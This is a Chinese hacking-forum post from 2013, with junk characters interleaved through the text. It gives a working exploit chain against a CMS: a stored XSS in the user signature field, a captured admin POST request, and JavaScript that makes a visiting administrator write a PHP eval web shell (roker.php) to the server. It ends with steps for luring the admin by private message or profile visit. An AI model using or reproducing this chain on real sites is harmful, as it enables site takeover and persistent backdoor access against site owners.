|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题6 H! O3 a$ n1 Y
官网已经修补了,所以重新下了源码# ?" C3 R7 w6 k; q! }
因为 后台登入 还需要认证码 所以 注入就没看了。
+ H8 l2 [# a* p7 P存在 xss" g0 \# X# x6 C) M
漏洞文件 user/member/skin_edit.php% o$ p) q( ~3 r% u9 Q/ d0 I
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:5 J; t- c% B6 y$ b6 U
* ~0 J6 z4 Z6 r
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>& L `- E, R' P2 F: k, ]! o
9 ~6 M: z4 ]# Z
</textarea></td></tr>5 M+ j% H* e ?
3 B; i- i& @. m9 X
user/do.php
) r3 R. J8 q: b: @* c: M e8 z
+ N1 G1 ^/ m( ]- @$ e, N* X0 j8 }9 K I
if($op=='zl'){ //资料$ p6 h, m. q( Y( o/ t2 r0 O
/ [! Z; {( i8 u2 r" W4 A) X if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) ( o/ N- Y4 I6 Y# S5 O$ Z
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));4 E0 }4 h% W7 r% T
& v3 [' t- A, U
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',. [5 k, |% N7 [9 E9 r
6 l; i$ V2 p* X' O CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'- W% [0 ~7 A$ Z3 s$ \5 {) x+ A
where CS_Name='".$cscms_name."'";
( I& ?9 Q5 U/ L1 R - n5 j0 ~* Q' O+ y
if($db->query($sql)){
; Q5 b/ H/ |* W' t4 k$ W+ S+ l' Q0 B
4 a' p, H" n5 f5 x7 L exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
( p. D& ]+ D; d 9 D( W3 g6 S. N$ h) V! J# D) s4 B
}else{
2 v8 E0 S4 Y8 Q! A/ O# ]9 v 2 h( l6 I5 d2 E, E: N0 E
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));2 B" |/ d7 v- X7 G) [: M# a( b
* R. N0 Q" e W1 j! F. L
}5 A8 R0 T) K( |
0 N# S% m! ?6 ? n& j5 S
& F: a. z2 W: ~; u) o1 _6 s3 A, t o8 [没有 过滤导致xss产生。9 ^' ^2 F, _% N
后台 看了下 很奇葩的是可以写任意格式文件。。
8 r. F% e$ d$ W8 ?; P2 v9 a抓包。。1 H7 Q5 u% t$ z I Q6 n; Q' {7 e3 T
* N' H3 ?. z; a5 C0 P4 N
8 Y. h5 m' k( S( M. e本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1: W2 p1 t* o5 m2 E8 e: R3 `! l
5 @0 R, u' J/ |/ @ i, B8 w+ @Accept: text/html, application/xhtml+xml, */*
, y% |' _' t4 e7 U8 T" C
C- _1 k, M' J+ [9 ]Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
% B H* z' P# Q. s ]4 c& O
- i7 k+ X, q( P( A; g( ]5 `Accept-Language: zh-CN
9 m8 O, e4 w3 b5 Q; c
8 z0 w' A' |5 o! L7 _2 z. f" `! V* sUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
& I' ]1 d% P2 D0 O7 P
6 ~* g# b8 q# RContent-Type: application/x-www-form-urlencoded
; p/ E7 x7 t& x Y+ D / P9 Z/ U: } t, z
Accept-Encoding: gzip, deflate6 C/ r+ z4 T9 J8 [8 I. q o
: G7 l$ o* b6 ^4 P% @ xHost: 127.0.0.1
0 E J0 i! p6 v, Z
! Z8 D2 G5 ?8 u- X- A }Content-Length: 38
" ~8 Z8 E& l* r % \4 I) m b% _( x6 H B
DNT: 15 a9 J6 N- b% K2 K2 X8 Y' i
( ?! n" T# r; r( J) X
Connection: Keep-Alive) V' Z2 g7 u9 s, R" E1 ^
6 l3 U9 g L3 ]
Cache-Control: no-cache
I: }( W% k" H! N, s+ @ 5 O' a2 u2 y5 l0 K1 o [3 f1 i
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594* {; k$ E# A8 D" u$ J' J! i
( y E) T8 N6 a3 X: {
3 l5 _( s' g; P: Nname=aaa.php&content=%3Cs%3E%3Ca%25%3E! |2 {% g6 T! M0 c
/ _0 D6 ] B L3 n* D8 `
0 Z; o# L* ~! c1 P: @6 a5 Z( |. \ E4 B. M$ r" [
于是 构造js如下。7 H$ l; k5 W/ ~% m. A) S
$ O. k! \8 \+ _6 c H6 b. {5 W本帖隐藏的内容<script> & P: l% J; k( d% S$ l+ t9 o5 \
thisTHost = top.location.hostname;
" H+ Q9 }7 d3 C" K+ _ 9 P! E+ N, _1 P, O' i# g; h# P
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";4 H$ t6 @: g! y, } k6 C
( h+ r) Y) A6 |. J9 g" n0 }( H6 Y) u- gfunction PostSubmit(url, data, msg) { . c" s9 q8 A; L# T3 f7 W" x" G+ J4 g" Q6 z
var postUrl = url;( D7 x- p0 F* K7 S! {4 Q. i, f
- r" j! K1 ~7 b var postData = data;
' m: H4 e4 Y( s& t, W, }& l* ~ var msgData = msg; I$ X# d; {" L
var ExportForm = document.createElement("FORM"); 1 ~ C9 }$ N4 b) y" W
document.body.appendChild(ExportForm); # q6 E1 V( G# z- @; Q: \
ExportForm.method = "POST";
I" Y! L8 ^: T L7 m var newElement = document.createElement("input"); * Y: A" f' v$ I% n8 a0 n X
newElement.setAttribute("name", "name"); " R' { i6 H0 p' R
newElement.setAttribute("type", "hidden");
6 A" e( t5 l( J/ _ var newElement2 = document.createElement("input");
! J! a" H9 F/ |$ N newElement2.setAttribute("name", "content"); $ Y9 \7 p' D& [
newElement2.setAttribute("type", "hidden");
, L1 r/ C0 I/ @6 j# Q, m ExportForm.appendChild(newElement); % e5 l) A3 @& T9 ?5 g
ExportForm.appendChild(newElement2);
M/ I% O+ t" W5 i5 @& x) i9 v newElement.value = postData;
/ J! y# C3 V( V: f# S newElement2.value = msgData; * Z4 M7 T- q2 Q2 u) ^* n
ExportForm.action = postUrl;
8 q$ }8 ~/ N% Q, q' i+ |! H+ N ExportForm.submit();
3 {0 l% [8 D5 r( _6 n% o};
5 F9 i4 {6 {7 g3 J9 i 1 R! U% p" p5 S5 c0 b6 |! c
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");0 j: A1 R# B% ]! ^, W9 Q# E
d9 S# m5 ?0 e2 s% u3 B$ y( ]</script>
0 ?% p# x; n5 f, y9 x: G6 {" q" r* o! i0 \* p
0 G0 L$ B7 n b& H* A, L
" t, {/ g3 p) a1 Ahttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
0 y: |5 k# R- u. j. [6 G用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
0 l4 D8 {4 v- _' K就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
9 ^4 i+ c1 w: p( C
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对